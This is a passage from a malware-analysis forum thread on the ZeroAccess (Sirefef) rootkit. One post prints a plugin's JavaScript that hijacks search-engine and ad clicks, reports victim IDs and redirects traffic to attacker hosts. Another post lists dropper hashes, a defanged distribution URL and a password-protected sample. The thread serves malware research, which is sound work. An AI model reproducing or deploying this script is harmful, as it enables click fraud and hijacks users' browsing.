A forum for reverse engineering, OS internals and malware analysis 

Rootkit ZeroAccess (alias MaxPlus, Sirefef)

Forum for analysis and discussion about malware.

Re: Rootkit ZeroAccess (alias Max++, Sirefef)

 #11165  by EP_X0FF
 Fri Jan 20, 2012 2:58 pm
markusg wrote:comes from infected pc
000000c0.@
13f707e9a8054d48837d28623a16196b
https://www.virustotal.com/file/68169f7 ... 327069533/
That's one of it plugins. Resource only dll with script data inside.
Code: Select all
<dat><jst>
var sv = 15;
var os = GetOS();
var CompId = GetCompId();
var cv = GetCodeVersion();
var u = GetString('u');

function getLocalPage(s, ref, url, user) 
{ 
	i = url.indexOf('/');
	host = url.substr(0, i);
	path = url.substr(i);
			
	if (0 < host.indexOf('.g.doubleclick.net') && !path.indexOf('/aclk?') && (0 < (i = path.indexOf('&adurl=http'))))
	{
      path = path.substr(i);
      if (0 < (i = path.indexOf('&',1))) path = path.substr(0, i);
      Reply(s, "HTTP/1.1 302\r\nLocation: http://81.17.26.206/g/google.php?&i="+ CompId + 
      "&w=" + u + decodeURIComponent(path) + 
      "\r\nConnection: close\r\nCache-Control: no-store, no-cache, must-revalidate, max-age=0\r\nPragma: no-cache\r\nContent-Length: 0\r\n\r\n");
      return true;
	}
					
	if (
		(!host.indexOf('www.google.') && !path.indexOf('/search?')) ||
		(!host.indexOf('www.google.') && !path.indexOf('/url?') && 0 < path.indexOf('&q=') && ref != url && ref != "") ||
    (!host.indexOf('www.bing.com') && !path.indexOf('/search?')) ||
    (!host.indexOf('search.icq.com') && !path.indexOf('/search/results.php?q=')) ||
    (0 <= host.indexOf('search.yahoo.') && !path.indexOf('/search;')) ||
    (0 < host.indexOf('.ask.com') && !path.indexOf('/web?')) ||
    (!host.indexOf('search.aol.com') && !path.indexOf('/aol/search?'))
	)
	{
		SendRequest(0xce1a1151, 
			"GET /r/redirect.php?id=" + CompId + "&u=" + u + 
			"&cv=" + cv + "&sv=" + sv + "&os=" + os + 
			" HTTP/1.0\r\nReferer: http://" + url + 
			"\r\nUser-Agent: " + user + 
			"\r\nHost: suzukimxm.cn\r\nConnection: close\r\n\r\n");
			
			if (!path.indexOf('/url?'))
			{
        body = '<META http-equiv="refresh" content="1;URL=\'http://' + url + '\'">';
        Reply(s, "HTTP/1.1 200\r\nContent-Type: text/html\r\nConnection: close\r\nCache-Control: no-store, no-cache, must-revalidate, max-age=0\r\nPragma: no-cache\r\nContent-Length: " + body.length + "\r\n\r\n" + body);
        return true;
			}
	}

	return false;
}
</jst></dat>

Re: Rootkit ZeroAccess (alias Max++, Sirefef)

 #11363  by rough_spear
 Tue Jan 31, 2012 11:43 am
Hi All, :D
ZAccess Dropper.very low detection. :twisted:
File name - 11.exe
VT link - https://www.virustotal.com/file/610aa19 ... /analysis/
SHA256: 610aa19ec762660b8b5a4bde4a9b9eb9ede453d70624d587c40ab3b11ff4b4dc
SHA1: 7e3a935e502aa1a0a30579542b2ca173db9d8156
MD5: 2e83d828313cdf3398512b29b8132a9a
File size: 264.0 KB ( 270336 bytes )

File name - X
VT link -https://www.virustotal.com/file/e9c6287 ... /analysis/
SHA256: e9c6287ad2216af395973cc3eb508bad8da885c08bd9a1271eb4c56c440d23c6
SHA1: beea09a2e91025d69cc225e8cd6cc45d71dceec7
MD5: 2092acd65e83775c735dba83ded42fcb
File size: 54.5 KB ( 55808 bytes )

web link - hxxp://hotlupdate.ru/11.exe

Regards,

rough_spear. ;)
Attachments
password - malware.
(306.28 KiB) Downloaded 66 times

Re: Rootkit ZeroAccess (alias Max++, Sirefef)

 #11396  by EP_X0FF
 Thu Feb 02, 2012 1:42 am
scettyscott wrote:Can someone provide me with the most recent version of this rootkit?
I'd like to learn more about it and potential removal procedures.

Hello,

any such "requests" will be removed.

Second attempt and I will ban you from this board and all your future accounts.


Post removed.
  • 1
  • 20
  • 21
  • 22
  • 23
  • 24
  • 38
 Return to “Malware”